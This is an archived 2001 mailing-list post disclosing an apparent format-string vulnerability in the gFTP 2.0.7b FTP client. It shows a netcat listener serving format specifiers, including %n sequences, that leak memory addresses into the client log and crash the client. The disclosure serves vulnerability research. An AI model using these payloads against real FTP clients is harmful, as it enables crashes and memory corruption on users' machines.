gftp exploitable?

From: Richard Johnson (thiefat_private)
Date: Tue Apr 17 2001 - 09:27:47 PDT

  • Next message: Jon Miner: "Re: LPD/LPRng Problems"

    While tinkering around with gftp, we've come up with this interesting
    result..
    
    (root)>gftp ftp://localhost
    Segmentation fault
    
    hrmm bet ud like to know what caused that eh
    
    (root)>nc -l -p 21
    %s
    %i
    %p
    %x
    %d
    %d %d %d %d %d %d %d %d %d
    %p %p %p %p %p %p %p %p %p
    %s%s%s%s%s%%n%s%%n%s%%n%s%%n%s%s
    
    this shows up in the log window and in log file
    
    gFTP 2.0.7b, Copyright (C) 1998-2000 Brian Masney <masneybat_private>. If
    you have any questions, comments, or suggestions about this program,
    please feel free to email them to me. You can
    always find out the latest news about gFTP from my website at
    http://gftp.seul.org/
    gFTP comes with ABSOLUTELY NO WARRANTY; for details, see the COPYING
    file. This is free software, and you are welcome to redistribute it
    under certain conditions; for details, see the COPYING file
    Looking up localhost
    Trying localhost:21
    Connected to localhost:21
    ?eè[^_?ì]Ã?öU?åfì,WVSè
    1077122816
    0x40339700
    40339700
    1077122816
    1077122816 1075537132 0 134795632 135333096 1075537132 2 135334848
    1075462592
    0x40339700 0x401b64ec (nil) 0x808d1e8 0x8110bc0 0x401b64ec 0x2 0x81104e8
    the last one made it segfault
    



    This archive was generated by hypermail 2b30 : Tue Apr 17 2001 - 14:01:31 PDT